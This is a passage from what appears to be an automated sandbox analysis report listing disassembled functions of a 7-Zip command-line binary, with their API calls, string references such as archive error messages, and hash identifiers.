                                                                                                                                                                                                        • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                        • Instruction ID: e14352d01e5fa83204428a724ab48e8b6c65288f28db69533a1b3d1670c79293
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC21F13231468096DB20CF15E44079E77F1E7C9BA5F8482A6DE8987798DFB9C98CCB10
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UNC
                                                                                                                                                                                                        • API String ID: 0-337201128
                                                                                                                                                                                                        • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                        • Instruction ID: 75a130893deff02b7bbc368bda81b03db90a5aafdac0fb145de34f6ea1dd4f46
                                                                                                                                                                                                        • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7121383634064586EB60CB56D48476973A0E745B9EF1490E7CF4987721EB79C8CDC705
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B90661
                                                                                                                                                                                                        • free.MSVCRT ref: 00B90680
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                                                                                        • String ID: ERROR:
                                                                                                                                                                                                        • API String ID: 2276422817-977468659
                                                                                                                                                                                                        • Opcode ID: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
                                                                                                                                                                                                        • Instruction ID: bc1d4c185d9c57ed7af8adfe130845c9a9bddb084cebd0a947cae8688581f0e2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D211901231260046CA25FB26E95537E73A0EB86BE1F4846F1AE6B47791DF3CC449C344
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4AA
                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                                        • String ID: Path64
                                                                                                                                                                                                        • API String ID: 3660427363-321863482
                                                                                                                                                                                                        • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                        • Instruction ID: 5bd772d5722e00aa0b6d2b63271f936cc71b926d41a7ad17693179c73449c169
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55213A7361564087EB14CF25E454B6EB7A0F794B84F60916AEF8A47BA8DB38C885CF40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Can not open encrypted archive. Wrong password?, xrefs: 00B94297
                                                                                                                                                                                                        • Can not open the file as archive, xrefs: 00B942D8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs
                                                                                                                                                                                                        • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                                                                                                                                                        • API String ID: 1795875747-2399861261
                                                                                                                                                                                                        • Opcode ID: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
                                                                                                                                                                                                        • Instruction ID: b385134f7b9b5fa2d7d105411f4f563392362946e5236d1709cd42e75b468e55
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4018F62320645A2EE18AB26E84075A33A1FB46BD5F9890B2EE0A47355DF28C999C311
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: wcscmp
                                                                                                                                                                                                        • String ID: \??\
                                                                                                                                                                                                        • API String ID: 3392835482-3047946824
                                                                                                                                                                                                        • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                        • Instruction ID: 88ed98e78537db7cc93848efcd7928e7cba8ece5a5bc99b2901866ef5e412f15
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30F09661601544D2DE149B66D9D032C2361FB85B9BF9054B1CF4A87714CF24C8FFC310
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92011
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputcfputs
                                                                                                                                                                                                        • String ID: Scan$Scanning
                                                                                                                                                                                                        • API String ID: 269475090-1436252306
                                                                                                                                                                                                        • Opcode ID: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
                                                                                                                                                                                                        • Instruction ID: e93fb32ae9c8d6cdfc91653fc527e2a0c649cb5907df6c047a534de370d30957
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9F0E962702541A1DF15DF34C9453AC33A0EB51F88F488171CF0D4B165EF68C5CAC310
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocExceptionStringThrow
                                                                                                                                                                                                        • String ID: out of memory
                                                                                                                                                                                                        • API String ID: 3773818493-2599737071
                                                                                                                                                                                                        • Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                        • Instruction ID: 8d6379f562e3dabd629e40575ebf1e8c9ee79b548f169ebf284278a831f1404f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7F0A962301B8682CF04DB11EA8571CB3B0FF89B85F648060CB4C47B28EBB9C8ADC300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9B7E4
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputcfputs
                                                                                                                                                                                                        • String ID: Scan $Scanning the drive:
                                                                                                                                                                                                        • API String ID: 269475090-1085461122
                                                                                                                                                                                                        • Opcode ID: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
                                                                                                                                                                                                        • Instruction ID: 0a8fd68dc59020cbd38561699c26161780a2efc2c925a99b830a6ecee3fbe679
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18E0866530694291CE05DB29DE4536C3361EB45BE5F9855B29E0D47225EF18C9DAC300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7ECEE
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7ECF6
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7EFE3
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7EFEB
                                                                                                                                                                                                          • Part of subcall function 00B54D78: free.MSVCRT ref: 00B54DBC
                                                                                                                                                                                                          • Part of subcall function 00B54D78: free.MSVCRT ref: 00B54DC4
                                                                                                                                                                                                          • Part of subcall function 00B54D78: free.MSVCRT ref: 00B54EAC
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                        • Instruction ID: 6097ddc42563e5c73bc214f9452d5c877651251de0e9a2952e52ac5db51abf2a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20A1B032304B8196DB20DF25D48476E77A0FB88B94F1481A6DFBE4BBA5EB79C855C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                        • Instruction ID: a354ee4cde4f1cc7cc6ddf985098d1ab570d10625212297a9e65befa5294b84b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1641A773204E8496CB30EF22E4A525EB7A1F785FD675442D1EF5A27768DB34C85ACB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                        • Instruction ID: 053f7bfbec97ab3083765ba76f83992768dff761f645e14f45e91fb236e7444f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D4182765096C086CA75AB62A050BEBBBF5F385784F459186DAC953B2ACE38CC44CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                        • Instruction ID: 943b176844853c4d5d790422ef43eaa6fd1a12002e2d66c01dd5273b3beabaf7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8531E973612A8086CB20DF25D5417AA37A0F7C8FE4F1842B6EE9A57794DF38C442C710
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                        • Instruction ID: 8e15795cd310ac5966c787f2b256dc24001b48e88297475a159e205a08b3c1f1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B821F223302A8089EB55AF26E85576E66D4FB86B95F5CC4A4EF2D1B380DF748845C312
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                        • Instruction ID: 8a304f914227a2da0acc515b5676a194c3c3f32d50a0d44a7d95918858d85ca4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F21B737712A9446CB11DF2AD51032973A1E785FEAB1882E4DF6D1B398DF38C886C750
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00B6779B
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00B677A7
                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00B6783C
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00B67848
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                        • Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                        • Instruction ID: a32847f236a4d0d4cbf9ad5f519a60e3644b701ccff05119d2e4fa91c45d1f92
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60212327704B4097CB209F2AE98426933B0FB48B98F285122EF4E87B14DF38D8A5C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowmalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2043655614-0
                                                                                                                                                                                                        • Opcode ID: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                        • Instruction ID: 41acd0f0226c4fc4d5cf8c8e76de7998f1d809f55b893d5248c8a254361894c6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF114F62612B8081CA60DF65D88131E73E5EB99BE4F2082A6ABBD17768DF34C855CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
